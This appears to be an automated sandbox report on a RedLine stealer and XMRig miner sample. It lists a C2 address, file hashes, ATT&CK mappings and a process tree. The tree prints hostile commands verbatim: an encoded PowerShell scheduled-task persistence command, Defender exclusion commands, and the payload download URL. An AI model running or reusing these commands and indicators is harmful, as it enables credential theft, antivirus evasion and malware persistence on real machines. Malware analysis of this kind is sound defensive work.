Analysis

  • max time kernel
    271s
  • max time network
    270s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-09-2022 21:05

General

  • Target

    https://anonfiles.com/CcGeB49byb/W194_exe

Malware Config

Extracted

Family

redline

Botnet

W194

C2

77.73.134.2:4427

Attributes
  • auth_value

    229c668cb9353e36290ab5b500224232

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 4 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Nirsoft 2 IoCs
  • XMRig Miner payload 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 9 IoCs
  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 5 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 56 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 35 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs
  • System policy modification 1 TTPs 1 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://anonfiles.com/CcGeB49byb/W194_exe
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1704
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1704 CREDAT:17410 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:4544
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe
      "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4236
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe"
        3⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Checks computer location settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAaABuAGgAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgAnACkAIAA8ACMAcABlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AKQAgADwAIwBhAHQAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBnAHoAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABkACMAPgA7AA=="
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2032
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3796
          • C:\Windows\system32\schtasks.exe
            schtasks /run /tn "GoogleUpdateTaskMachineQC"
            5⤵
              PID:660
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe"
          3⤵
          • UAC bypass
          • Windows security bypass
          • Executes dropped EXE
          • Checks computer location settings
          • Windows security modification
          • Checks whether UAC is enabled
          • Suspicious use of SetThreadContext
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:4640
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1460
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe" -Force
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:1404
          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2984
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe" -Force
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            PID:2088
          • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe
            "C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:632
          • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe
            "C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe" /o /c "Windows-Defender" /r
            4⤵
            • Executes dropped EXE
            PID:3612
    • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
      1⤵
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:3252
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAaABuAGgAIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAIgBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgAnACkAIAA8ACMAcABlACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABMAG8AZwBPAG4AKQAgADwAIwBhAHQAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBnAHoAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAHQAeABkACMAPgA7AA=="
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:4784
      • C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exe"
        2⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        PID:5056
      • C:\Windows\explorer.exe
        C:\Windows\explorer.exe lfbwpqcwkzzu0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeVB3K3IQ9adeOlWsGypRCxSKlOloRISgwtn7vaWwIHHTGEKUdZ9P1Zb/Nmecds8k6lS5X6xDnIsSE6kPSbJ1MGq7bkIO7FdiIBBLef6SB5Tgp/gvgU2Oa4T0mj+1Id8HXv6QEaW4r6FKvMyXAfcIbz3ZkCuWCqmcQcoOGsbHtIzuc9I8Pa4H+kyJHZawm+wn/QItPnZAEnIM7pRwp+QORP7RUnAkNzLrFVKYyapWTIDEJh5C8LrLV/LD8h2YJLV+RS7IH1f44JUspfdhYqZT9bmamoxcT6RqW6GBEO8WWZa0XrDLIIj9SuXH72mm4RdN3E+nPlw0u8ibD20XUUreihvER5cYqKj4CgK0X+Pj5hjI5a4zI5624oAF4KR2j5+p8kqg4AYjjP6IKvPr84I70fW2O/DVA+hV8rKdSrwTeEsrzW6/eM+AELBVYXEPrmSVi
        2⤵
        • Executes dropped EXE
        • Checks BIOS information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:3592
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:1000
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\test.bat"
        1⤵
          PID:3420
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
          1⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • Suspicious use of WriteProcessMemory
          PID:2560
        • C:\Windows\system32\taskmgr.exe
          "C:\Windows\system32\taskmgr.exe" /4
          1⤵
          • Checks SCSI registry key(s)
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:3316

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Privilege Escalation

        Bypass User Account Control

        1
        T1088

        Defense Evasion

        Bypass User Account Control

        1
        T1088

        Disabling Security Tools

        3
        T1089

        Modify Registry

        6
        T1112

        Credential Access

        Credentials in Files

        2
        T1081

        Discovery

        Query Registry

        4
        T1012

        System Information Discovery

        5
        T1082

        Peripheral Device Discovery

        1
        T1120

        Collection

        Data from Local System

        2
        T1005

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          3KB

          MD5

          fee026663fcb662152188784794028ee

          SHA1

          3c02a26a9cb16648fad85c6477b68ced3cb0cb45

          SHA256

          dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b

          SHA512

          7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\W194.exe.log
          Filesize

          520B

          MD5

          41c37de2b4598f7759f865817dba5f80

          SHA1

          884ccf344bc2dd409425dc5ace0fd909a5f8cce4

          SHA256

          427235491a8da3fc8770ed60d30af731835c94585cd08d4d81fca9f703b283bc

          SHA512

          a8f3c74916623de100e4cf22e05df9cdf541b1e32443aab0434f35fb9c4a7fa950b997ce589b532e65731ae471a1f152cd5c00ea1df4bd7a6b57eb27c93c54bd

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe
          Filesize

          10.6MB

          MD5

          ae63b9a4534477065720523df6733d67

          SHA1

          b519abcf8788956041b6f911fa5d5a5154358ad5

          SHA256

          1334edfe57dcbe8d6d4c5b951bbe04e5af45cd203dddc446a5bf241e09041900

          SHA512

          4ba41773b50459e6924a16bba8fbf48dbdad72fcb4a362fb8c8c49279221165287e2a6f61f2b55a5cabc009c24fae2b1d8b2fde6f7fec7080a2564418c1baf13

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\48VMALJK\W194.exe.12wamlz.partial
          Filesize

          10.6MB

          MD5

          ae63b9a4534477065720523df6733d67

          SHA1

          b519abcf8788956041b6f911fa5d5a5154358ad5

          SHA256

          1334edfe57dcbe8d6d4c5b951bbe04e5af45cd203dddc446a5bf241e09041900

          SHA512

          4ba41773b50459e6924a16bba8fbf48dbdad72fcb4a362fb8c8c49279221165287e2a6f61f2b55a5cabc009c24fae2b1d8b2fde6f7fec7080a2564418c1baf13

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          b07006e57b8aec31047596deb0dd0883

          SHA1

          34f0cb0205478c43560e3aa59808318b7189b938

          SHA256

          fd43235729e0374afdc358a5f9d55d344ee094dd09f0d7db0e73cf7bdf99345c

          SHA512

          0619dd0eb492405257071cafd6c4cc1dd60a1250f49b255fc88cf64a6c5f87533f709b9c3b4b1fa1b9a2b38ff3071a32a608c34c35c7d9b5e9bb5e5ee5002bf0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          2ac3c9ba89b8c2ef19c601ecebb82157

          SHA1

          a239a4b11438c00e5ff89ebd4a804ede6a01935b

          SHA256

          3c2714ce07f8c04b3f8222dfe50d8ae08f548b0e6e79fe33d08bf6f4c2e5143e

          SHA512

          b1221d29e747b37071761b2509e9109b522cce6411f73f27c9428ac332d26b9f413ae6b8c0aeac1afb7fab2d0b3b1c4af189da12fe506287596df2ef8f083432

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          f23bd990b4ae9e9e951280e61c3ac6fb

          SHA1

          7bf01f4473e5b5b1ff469016838b622b07ef7691

          SHA256

          f17ad9f8f56325634c3c56ceb4495f881f67ad9c994dbbf62ba324732826672e

          SHA512

          91f75ee178b91dfd4d8c7d0b5feff73a144a0f39baf477cf5da3e178ea3e574abd249c85cd979c78920382b95cd20549e46b2c4078afd1859a287f62c2733701

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          2b950be7ca8339ce2658a6138bcac504

          SHA1

          19e65c32da02964210cff0c996a8bcf882126e04

          SHA256

          dd55e35c4da0f022023399b2f890a39f46c3fef36335c1588a60e4c34bfb3e48

          SHA512

          37615c95700d5db752ddf5b89ae05c07f8e16e809982173af7046740d76af2274e65abd9813304418d409cc2118fd0e336f6c859145c8499f98531b31b6d7cd9

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
          Filesize

          10.3MB

          MD5

          c7b61d7e08a2ce0e54c5018e483b7825

          SHA1

          12a5e2d06644bef56f87ed7df2c9efcdee379e58

          SHA256

          f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03

          SHA512

          27ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.exe
          Filesize

          10.3MB

          MD5

          c7b61d7e08a2ce0e54c5018e483b7825

          SHA1

          12a5e2d06644bef56f87ed7df2c9efcdee379e58

          SHA256

          f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03

          SHA512

          27ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe
          Filesize

          406KB

          MD5

          4959db4b11ef1140006d9bb643bd1328

          SHA1

          0702d5561c71cee3cd62d535a54b11209d5812c1

          SHA256

          9306329f22a227e4576a72b55d24467ba3447f8c9c41299e7b5679696d4ff7e2

          SHA512

          60dc958f0282435ff408e4e6016481339957bef569419e186960b1141daef2cf676dc578c614101abf1b6042038a1c8d58e688ef7c6e0b8415683cf8bfa9831f

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe
          Filesize

          406KB

          MD5

          4959db4b11ef1140006d9bb643bd1328

          SHA1

          0702d5561c71cee3cd62d535a54b11209d5812c1

          SHA256

          9306329f22a227e4576a72b55d24467ba3447f8c9c41299e7b5679696d4ff7e2

          SHA512

          60dc958f0282435ff408e4e6016481339957bef569419e186960b1141daef2cf676dc578c614101abf1b6042038a1c8d58e688ef7c6e0b8415683cf8bfa9831f

        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\W194.exe
          Filesize

          406KB

          MD5

          4959db4b11ef1140006d9bb643bd1328

          SHA1

          0702d5561c71cee3cd62d535a54b11209d5812c1

          SHA256

          9306329f22a227e4576a72b55d24467ba3447f8c9c41299e7b5679696d4ff7e2

          SHA512

          60dc958f0282435ff408e4e6016481339957bef569419e186960b1141daef2cf676dc578c614101abf1b6042038a1c8d58e688ef7c6e0b8415683cf8bfa9831f

        • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe
          Filesize

          25KB

          MD5

          5951b52c9b4d11ca7f4f33e5a3fb2c31

          SHA1

          0bc54fd699fff7b93e5c447a141c0d904924ab0d

          SHA256

          70b785e5cb5b2e61c0f5da4a71ab0bbd14d9a0849387f037e0d75cc1ffe0a082

          SHA512

          30b3b1eed05ba724d9a19d0d301b6ffb45222a47cc5476cc7f61ae565ddea4deea669f6fc3f38a1c5f24396eb4d3d6a7a8b58992fdfe2fac57dbcc2fa5b9b1d8

        • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\1547eed8-16e3-4e9a-8b50-91ebc91be6a1.exe
          Filesize

          25KB

          MD5

          5951b52c9b4d11ca7f4f33e5a3fb2c31

          SHA1

          0bc54fd699fff7b93e5c447a141c0d904924ab0d

          SHA256

          70b785e5cb5b2e61c0f5da4a71ab0bbd14d9a0849387f037e0d75cc1ffe0a082

          SHA512

          30b3b1eed05ba724d9a19d0d301b6ffb45222a47cc5476cc7f61ae565ddea4deea669f6fc3f38a1c5f24396eb4d3d6a7a8b58992fdfe2fac57dbcc2fa5b9b1d8

        • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe
          Filesize

          88KB

          MD5

          17fc12902f4769af3a9271eb4e2dacce

          SHA1

          9a4a1581cc3971579574f837e110f3bd6d529dab

          SHA256

          29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

          SHA512

          036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

        • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\AdvancedRun.exe
          Filesize

          88KB

          MD5

          17fc12902f4769af3a9271eb4e2dacce

          SHA1

          9a4a1581cc3971579574f837e110f3bd6d529dab

          SHA256

          29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

          SHA512

          036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

        • C:\Users\Admin\AppData\Local\Temp\fffb6a92-d296-430f-9af4-3fc6dc3074eb\test.bat
          Filesize

          17B

          MD5

          3276ac7dd29853e29046e0ffc4dd3b09

          SHA1

          2d14ed71932b60a3f3eebadf1c092cb7633c3fdf

          SHA256

          66304c3a46bcc4e191d40db4ed6b6f3c25049a730a63af205485979f430e445a

          SHA512

          73e3c85c9aaacacdee433beb1e8503df9f3df227c8d567cf851549c9735592dfca059a042745d33d709797e71c2c97a0d509dbf9334ba81a1382b82ab2d36bde

        • C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exe
          Filesize

          2.6MB

          MD5

          d81aa58c06222d5f5e8cb8d240bbb7ba

          SHA1

          e42c7660cc36a6f574a0af27bb04653dea8adfcd

          SHA256

          63e2bbf99b809a80c009303d077596cb33a8f7f7e0419bf0b5fa21958943a310

          SHA512

          f5c0de7a8fa5cfb55d29a7621c93fc813567c0b1b177b22f38fc8b19bc29fecfa9c0c74c6dc52183a0b1888c266d54efd884e490c335161fb47c7c643905baa7

        • C:\Users\Admin\AppData\Roaming\Adobe\Telemetry\sihost64.exe
          Filesize

          2.6MB

          MD5

          d81aa58c06222d5f5e8cb8d240bbb7ba

          SHA1

          e42c7660cc36a6f574a0af27bb04653dea8adfcd

          SHA256

          63e2bbf99b809a80c009303d077596cb33a8f7f7e0419bf0b5fa21958943a310

          SHA512

          f5c0de7a8fa5cfb55d29a7621c93fc813567c0b1b177b22f38fc8b19bc29fecfa9c0c74c6dc52183a0b1888c266d54efd884e490c335161fb47c7c643905baa7

        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
          Filesize

          10.3MB

          MD5

          c7b61d7e08a2ce0e54c5018e483b7825

          SHA1

          12a5e2d06644bef56f87ed7df2c9efcdee379e58

          SHA256

          f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03

          SHA512

          27ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4

        • C:\Users\Admin\AppData\Roaming\Google\Chrome\updater.exe
          Filesize

          10.3MB

          MD5

          c7b61d7e08a2ce0e54c5018e483b7825

          SHA1

          12a5e2d06644bef56f87ed7df2c9efcdee379e58

          SHA256

          f2ea8dbc8434b46125aaaf78fb5361a3967198851265a41084d3dbc264d52a03

          SHA512

          27ce39f329152acc17f0545a9debffef60f75e2051c90bc88d8b0c4b19ab5437e933a80a5270102a308863f1563fed99b21eb332cac909f61b26e5414c9b66c4

        • \Users\Admin\AppData\Roaming\FBFA.tmp
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

        • memory/632-184-0x0000000000000000-mapping.dmp
        • memory/660-148-0x0000000000000000-mapping.dmp
        • memory/1404-201-0x0000000005810000-0x0000000005876000-memory.dmp
          Filesize

          408KB

        • memory/1404-218-0x0000000007430000-0x00000000074C6000-memory.dmp
          Filesize

          600KB

        • memory/1404-211-0x0000000067C40000-0x0000000067C8C000-memory.dmp
          Filesize

          304KB

        • memory/1404-200-0x0000000004DE0000-0x0000000004E02000-memory.dmp
          Filesize

          136KB

        • memory/1404-213-0x0000000006450000-0x000000000646E000-memory.dmp
          Filesize

          120KB

        • memory/1404-192-0x0000000000000000-mapping.dmp
        • memory/1404-203-0x0000000005880000-0x00000000058E6000-memory.dmp
          Filesize

          408KB

        • memory/1404-209-0x0000000005EA0000-0x0000000005EBE000-memory.dmp
          Filesize

          120KB

        • memory/1404-215-0x00000000077F0000-0x0000000007E6A000-memory.dmp
          Filesize

          6.5MB

        • memory/1404-217-0x0000000007220000-0x000000000722A000-memory.dmp
          Filesize

          40KB

        • memory/1460-214-0x0000000067C40000-0x0000000067C8C000-memory.dmp
          Filesize

          304KB

        • memory/1460-224-0x0000000007650000-0x000000000766A000-memory.dmp
          Filesize

          104KB

        • memory/1460-225-0x0000000007630000-0x0000000007638000-memory.dmp
          Filesize

          32KB

        • memory/1460-190-0x0000000000000000-mapping.dmp
        • memory/1460-222-0x0000000007540000-0x000000000754E000-memory.dmp
          Filesize

          56KB

        • memory/2032-145-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/2032-144-0x000001AD35230000-0x000001AD35252000-memory.dmp
          Filesize

          136KB

        • memory/2032-146-0x00007FFE34550000-0x00007FFE35011000-memory.dmp
          Filesize

          10.8MB

        • memory/2032-142-0x0000000000000000-mapping.dmp
        • memory/2088-187-0x0000000000000000-mapping.dmp
        • memory/2088-212-0x0000000067C40000-0x0000000067C8C000-memory.dmp
          Filesize

          304KB

        • memory/2088-193-0x00000000021D0000-0x0000000002206000-memory.dmp
          Filesize

          216KB

        • memory/2088-195-0x0000000004E40000-0x0000000005468000-memory.dmp
          Filesize

          6.2MB

        • memory/2088-216-0x0000000006E00000-0x0000000006E1A000-memory.dmp
          Filesize

          104KB

